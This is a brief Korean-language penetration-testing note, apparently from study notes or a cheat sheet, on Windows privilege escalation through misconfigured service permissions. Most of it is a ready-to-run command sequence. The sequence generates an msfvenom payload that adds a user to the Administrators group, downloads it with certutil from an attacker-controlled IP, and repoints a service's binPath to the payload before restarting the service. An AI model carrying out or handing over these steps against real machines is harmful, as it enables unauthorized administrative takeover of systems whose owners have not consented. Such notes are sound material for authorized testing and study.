1. 서비스 자체에 권한을 가지고 있을 경우: 서비스의 바이너리 샐행 파일 경로인 `binPath` 속성을 변경해 공격자의 페이로드가 서비스 대신 실행되도록 함. 2. 서비스 바이너리 실행 파일 자체에 대한 권한을 가지고 있을 경우: 서비스 바이너리 실행 파일을 공격자의 페이로드로 덮어씌운 뒤, 공격자의 페이로드 실행 ```powershell # 유저가 특정 서비스에 어떤 권한이 있는지 확인 accesschk.exe -accepteula -ucqv <USER> <SERVICE> ----SERVICE_ALL_ACCESS # 서비스에 대한 모든 권한 # 페이로드 생성 in local Kali msfvenom -p windows/x64/exec CMD="net localgroup administrators <user> /add" -f exe-service -o evilsvc.exe # 서비스 파일 Transfer certutil.exe -urlcache -split -f http://<IP>/evilsvc.exe evilsvc.exe # 서비스 binPath 변경 sc.exe config <SERVICE> binpath="C:\\Users\\<USER>\\Desktop\\evilsvc.exe" # 서비스 재시작 후 페이로드 실행 확인 Restart-Service <SERVICE> net localgroup Administrators ```